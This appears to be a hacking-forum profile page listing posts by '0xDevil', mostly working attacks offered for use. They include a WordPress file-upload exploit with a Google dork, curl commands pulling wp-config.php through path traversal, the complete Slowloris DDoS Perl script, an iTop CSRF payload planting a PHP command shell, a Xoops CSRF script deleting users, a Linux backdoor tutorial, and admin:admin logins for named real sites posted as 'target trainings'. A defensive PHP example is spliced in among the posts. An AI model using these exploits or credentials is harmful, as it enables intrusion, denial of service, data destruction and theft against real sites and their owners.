
0xDevil

New Member
  • Posts

    211
  • Joined

  • Last visited

Site reputation

0 Neutral

1 follower

About 0xDevil

  • Rank
    0xDevil
  • Date of birth 10/10/1987

Converted

  • Name
    MuhammaD
  • Main os
    Kali
  • Programming language
    No
  • Skype
    devil_hacking


  1. Hello, dear friend. The login page you are entering the username and password into is cPanel, and its username and password are different from the database username and password. The username and password you have now are for the site's CMS itself, not for cPanel.
  2. 0xDevil

    Arbitrary File Upload Vulnerability In Wp Dreamwork Gallery

    Dork
    Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/

    patch shell
    /wp-content/uploads/dreamwork/1_uploadfolder/big/

    Html Code
    <html>
    <body>
    <form action="http://http://site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="task" value="drm_add_new_album" />
    <input type="hidden" name="album_name" value="Arbitrary File Upload" />
    <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
    <input type="file" name="album_img" value="" />
    <input type="submit" value="Submit" />
    </form>
    </body>
    </html>
  3. 0xDevil

    7Learn Config

    Hello, thanks for your good post. Please put the configs in the relevant topic: http://www.iran-cyber.net/threads/%D8%AA%D8%A7%D9%BE%DB%8C%DA%A9-%D8%AC%D8%A7%D9%85%D8%B9-%DA%A9%D8%A7%D9%86%D9%81%DB%8C%DA%AF-%D9%87%D8%A7%DB%8C-sentry-mba.2062/
  4. 0xDevil

    Arbitrary File Download In Memphis Document Library 3.1.5

    # Exploit Title: Arbitrary file download in Memphis Document Library 3.1.5
    # Google Dork: inurl:"mdocs-posts" -site:wordpress.org
    # Date: 22/03/2016
    # Exploit Author: Felipe Molina (@felmoltor)
    # Vendor Homepage: https://wordpress.org
    # Software Link: https://downloads.wordpress.org/plugin/memphis-documents-library.3.1.5.zip
    # Version: 3.1.5 (Vulnerable from 2.3 to 3.1.5, fixed in 3.1.6)
    # Tested on: Ubuntu 12.04, Wordpress 4.4.2.
    # CVE : N/A
    # Vulnerable file: memphis-documents-library/mdocs-downloads.php
    # Vulnerable function: mdocs_img_preview()
    # Vulnerable GET parameter: Injectable 'mdocs-img-preview'
    # Vulnerable line: 90 to 93
    # Vulnerable code:

    87 function mdocs_img_preview() {
    88     require_once(ABSPATH . 'wp-includes/pluggable.php');
    89     $upload_dir = wp_upload_dir();
    90     $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview'];
    91     $content = file_get_contents($image);
    92     header('Content-Type: image/jpeg');
    93     echo $content; exit();
    94 }

    # POC:

    curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php

    or if the plugin is not installed in the root folder of wordpress, for example in the folder "mdocs-posts":

    curl http://example.site.com/mdocs-posts/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php
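
A containment check for the `mdocs_img_preview()` pattern quoted in the advisory above, as an added example that is not part of the original post and is not the plugin's 3.1.6 fix. The helper name `resolve_preview_path()` and the temporary directory layout are hypothetical and constructed for the demonstration.

```php
<?php
// Added example (assumption: standalone PHP 7.1+ CLI, no WordPress loaded).

/**
 * Resolve a user-supplied file name against $baseDir and return the canonical
 * path only when it is a regular file inside $baseDir; otherwise return null.
 */
function resolve_preview_path(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "../", "./" and symlinks, and fails for missing files,
    // so the comparison below is made on the path the filesystem would really open.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare against the base plus a trailing separator so that a sibling such as
    // ".../mdocs-other" is not accepted as a child of ".../mdocs".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo layout: a config file two levels above the preview directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'mdocs-demo-' . bin2hex(random_bytes(4));
mkdir($root . '/uploads/mdocs', 0700, true);
file_put_contents($root . '/wp-config.php', "<?php // constructed secret\n");
file_put_contents($root . '/uploads/mdocs/cover.jpg', 'constructed image bytes');

$base = $root . '/uploads/mdocs';
$samples = ['cover.jpg', './cover.jpg', '../../wp-config.php', '/etc/passwd', 'missing.jpg'];
foreach ($samples as $name) {
    $path = resolve_preview_path($base, $name);
    printf("%-22s => %s\n", $name, $path === null ? 'rejected' : 'served');
}

// Remove the constructed files again.
unlink($root . '/uploads/mdocs/cover.jpg');
unlink($root . '/wp-config.php');
rmdir($root . '/uploads/mdocs');
rmdir($root . '/uploads');
rmdir($root);
```

Only `cover.jpg` and `./cover.jpg` are served; the traversal, absolute-path and missing-file requests are rejected before any file is read.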
  5. 0xDevil

    Wordpress Hb Audio Gallery Lite 1.0.0 Arbitrary File Download

    Hello, I also made a video of this exploit. wp exp.rar
  6. Hello, here is a powerful script for DDOS attacks. The command to run this script: perl slowloris.pl -dns (Victim URL or IP) -options Here is the script: #!/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print <<EOTEXT; Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris EOTEXT my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); my ( $cache, $httpready, $method, $ssl, $rand, $tcpto ); my $result = GetOptions( 'shost=s' => \$shost, 'dns=s' => \$host, 'httpready' => \$httpready, 'num=i' => \$connections, 'cache' => \$cache, 'port=i' => \$port, 'https' => \$ssl, 'tcpto=i' => \$tcpto, 'test' => \$test, 'timeout=i' => \$timeout, 'version' => \$version, ); if ($version) { print "Version 0.7\n"; exit; } unless ($host) { print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; print "\n\tType 'perldoc $0' for help with options.\n\n"; exit; } unless ($port) { $port = 80; print "Defaulting to port 80.\n"; } unless ($tcpto) { $tcpto = 5; print "Defaulting to a 5 second tcp connection timeout.\n"; } unless ($test) { unless ($timeout) { $timeout = 100; print "Defaulting to a 100 second re-try timeout.\n"; } unless ($connections) { $connections = 1000; print "Defaulting to 1000 connections.\n"; } } my $usemultithreading = 0; if ( $Config{usethreads} ) { print "Multithreading enabled.\n"; $usemultithreading = 1; use threads; use threads::shared; } else { print "No multithreading capabilites found!\n"; print "Slowloris will be slower than normal as a result.\n"; } my $packetcount : shared = 0; my $failed : shared = 0; my $connectioncount : shared = 0; srand() if ($cache); if ($shost) { $sendhost = $shost; } else { $sendhost = $host; } if ($httpready) { $method = "POST"; } else { $method = "GET"; } if ($test) { my @times = ( "2", "30", "90", "240", "500" ); my $totaltime = 0; foreach (@times) { $totaltime = 
$totaltime + $_; } $totaltime = $totaltime / 60; print "This test could take up to $totaltime minutes.\n"; my $delay = 0; my $working = 0; my $sock; if ($ssl) { if ( $sock = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } else { if ( $sock = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } if ($working) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "GET /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now comes the waiting game...\n"; } else { print "That's odd - I connected but couldn't send the data to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } } else { print "Uhm... I can't connect to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } for ( my $i = 0 ; $i <= $#times ; $i++ ) { print "Trying a $times[$i] second delay: \n"; sleep( $times[$i] ); if ( print $sock "X-a: b\r\n" ) { print "\tWorked.\n"; $delay = $times[$i]; } else { if ( $SIG{__WARN__} ) { $delay = $times[ $i - 1 ]; last; } print "\tFailed after $times[$i] seconds.\n"; } } if ( print $sock "Connection: Close\r\n\r\n" ) { print "Okay that's enough time. Slowloris closed the socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } else { print "Remote server closed socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } if ( $delay < 166 ) { print <<EOSUCKS2BU; Since the timeout ended up being so small ($delay seconds) and it generally takes between 200-500 threads for most servers and assuming any latency at all... you might have trouble using Slowloris against this target. 
You can tweak the -timeout flag down to less than 10 seconds but it still may not build the sockets in time. EOSUCKS2BU } } else { print "Connecting to $host:$port every $timeout seconds with $connections sockets:\n"; if ($usemultithreading) { domultithreading($connections); } else { doconnections( $connections, $usemultithreading ); } } sub doconnections { my ( $num, $usemultithreading ) = @_; my ( @first, @sock, @working ); my $failedconnections = 0; $working[$_] = 0 foreach ( 1 .. $num ); #initializing $first[$_] = 0 foreach ( 1 .. $num ); #initializing while (1) { $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 0 ) { if ($ssl) { if ( $sock[$z] = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; } else { $working[$z] = 0; } } else { if ( $sock[$z] = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK } else { $working[$z] = 0; } } if ( $working[$z] == 1 ) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "$method /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { print $handle "$primarypayload"; if ( $SIG{__WARN__} ) { $working[$z] = 0; close $handle; $failed++; $failedconnections++; } else { $packetcount++; $working[$z] = 1; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } } print "\t\tSending data.\n"; foreach my $z ( 1 .. 
$num ) { if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; if ( print $handle "X-a: b\r\n" ) { $working[$z] = 1; $packetcount++; } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } } print "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; sleep($timeout); } } sub domultithreading { my ($num) = @_; my @thrs; my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; } my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; } } __END__ =head1 TITLE Slowloris by llaera =head1 VERSION Version 1.0 Stable =head1 DATE 02/11/2013 =head1 AUTHOR Laera Loris [email protected] =head1 ABSTRACT Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. =head1 AFFECTS Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...? =head1 NOT AFFECTED IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
  7. 0xDevil

    Problem Running a Perl Script on the Server

    Hello, did you set the chmod permissions to 755? If you set them and still got no result, the script probably has a problem! In that case you should get help from Mr. L3gi0n.
  8. 0xDevil

    Itop 2.2.1 Cross Site Request Forgery

    Advisory ID: HTB23293
    Product: iTop
    Vendor: Combodo
    Vulnerable Version(s): 2.2.1 and probably prior
    Tested Version: 2.2.1
    Advisory Publication: February 10, 2016 [without technical details]
    Vendor Notification: February 10, 2016
    Vendor Patch: February 11, 2016
    Public Disclosure: March 18, 2016
    Vulnerability Type: Cross-Site Request Forgery [CWE-352]
    Risk Level: High
    CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
    Solution Status: Fixed by Vendor
    Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

    -----------------------------------------------------------------------------------------------

    Advisory Details:

    High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via Cross-Site Request Forgery flaw that is also present in the application. The vulnerability exists due to absence of validation of HTTP request origin in "/env-production/itop-config/config.php" script, as well as lack of user-input sanitization received via "new_config" HTTP POST parameter.

    A remote unauthenticated attacker can perform CSRF attack and execute arbitrary PHP code on the vulnerable system with privileges of the web server. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary system commands on the web server, gain complete access to vulnerable web application and its databases that may contain very sensitive information.

    The attacker shall create a malicious web page with CSRF exploit code, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and permanently inject malicious PHP code into iTop configuration file.

    CSRF exploit will inject the following PHP code into iTop configuration file:

    <? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>

    To reproduce the vulnerability, just create an empty HTML file and paste the following CSRF exploit code into it:

    <form action="http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor" method="post" name="main">
    <input type="hidden" name="operation" value="save">
    <input type="hidden" name="prev_config" value="1">
    <input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>">
    <input value="submit" id="btn" type="submit" />
    </form>

    Then login to iTop website with admin account and open the file in your browser.

    After successful exploitation an attacker can run arbitrary system commands using the "/pages/UI.php" script. This simple PoC will execute "/bin/ls" directory listing command:

    http://[host]/pages/UI.php?cmd=ls

    -----------------------------------------------------------------------------------------------

    Solution:

    Replace the file datamodels/2.x/itop-config/config.php by the version from the appropriate revision from SVN, then run the setup again.

    More Information:
    https://sourceforge.net/p/itop/tickets/1202/

    -----------------------------------------------------------------------------------------------

    References:

    [1] High-Tech Bridge Advisory HTB23293 - https://www.htbridge.com/advisory/HTB23293 - RCE via CSRF in iTop
    [2] iTop - http://www.combodo.com - iTop: open source ITIL ITSM Software.
    [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
    [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
    [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.

    -----------------------------------------------------------------------------------------------

    Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

    https://packetstormsecurity.com/files/136297/itop-xsrf.txt
  9. 0xDevil

    Xoops 2.5.7.2 Directory Traversal Bypass / Csrf

    Xoops 2.5.7.2 Directory Traversal Bypass CSRF Arbitrary User Deletions Vulnerabilities

    Vendor:
    =============
    xoops.org

    Product:
    ================
    Xoops 2.5.7.2

    Vulnerability Type:
    ===========================
    Xoops 2.5.7.2 Directory Traversal Bypass / CSRF - Arbitrary User Deletions Vulnerabilities

    Vulnerability Details:
    =====================
    Xoops 2.5.7.2 has checks to defend against directory traversal attacks. However, they can be easily bypassed by simply issuing "..././" instead of "../"

    References:
    http://xoops.org/modules/news/article.php?storyid=6757

    Exploit Codes:
    ==============
    In Xoops code in 'protector.php' the following check is made for dot dot slash "../" in HTTP requests

    /////////////////////////////////////////////////////////////////////////////////
    if( is_array( $_GET[ $key ] ) ) continue ;
    if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) {
        $this->last_error_type = 'DirTraversal' ;
        $this->message .= "Directory Traversal '$val' found.\n" ;
    ////////////////////////////////////////////////////////////////////////////////

    The above Xoops directory traversal check can be defeated by using ..././..././..././..././

    you can test the theory by using example below test case by supplying ..././ to GET param.

    $val=$_GET['c'];
    if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) {
        echo "traversal!";
    }else{
        echo "ok!" . $val;
    }

    Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL users from the Xoops database.

    References:
    http://xoops.org/modules/news/article.php?storyid=6757

    Exploit Codes:
    =============
    Following CSRF attack delete all users from database, following POC code will sequentially delete 100 users from the Xoops application.

    <iframe name="ifrm" style="display:none" name="hidden-form"></iframe>
    <form target="ifrm" name='memberslist' id='CSRF' action='http://localhost/xoops-2.5.7.2/htdocs/modules/system/admin.php?fct=users' method='POST'>
    <input type="hidden" id="ids" name="memberslist_id[]" />
    <input type="hidden" name="fct" value="users" />
    <input type="hidden" name="edit_group" value="" />
    <input type="hidden" name="selgroups" value="" />
    <input type="hidden" name="op" value="users_add_delete_group" />
    <input type="hidden" name="op" value="action_group" />
    <input type="hidden" name="Submit" value="Submit+Query" />
    </form>
    <script>
    var c=-1
    var amttodelete=100
    var id=document.getElementById("ids")
    var frm=document.getElementById("CSRF")
    function doit(){
        c++
        arguments[1].value=c
        arguments[0].submit()
        if(c>=amttodelete){
            clearInterval(si)
            alert("Done!")
        }
    }
    var si=setInterval(doit, 1000, frm, id)
    </script>

    http://0day.today/exploit/25086
  10. 0xDevil

    Target Trainings

    Us:admin Pas:admin Host:http://sonopsolar.co.za/wp-admin
  11. 0xDevil

    Target Trainings

    Us:admin pas:admin Host:http://1worldtravelgroup.co.za/wp-admin
  12. 0xDevil

    Target Trainings

    Us:admin Pas:admin Host:http://forkmax.com/wp-admin
  13. 0xDevil

    Target Trainings

    Us:admin pas:admin Host:http://www.sethscouriers.co.za/wp-admin Don't forget us either, friends
  14. Hello, a tutorial on backdooring a Linux server: first upload the Loc.c file to the server, then use the command below to get a backdoor on the server. gcc -fno-stack-protector -z execstack filename.c -o filename loc.rar
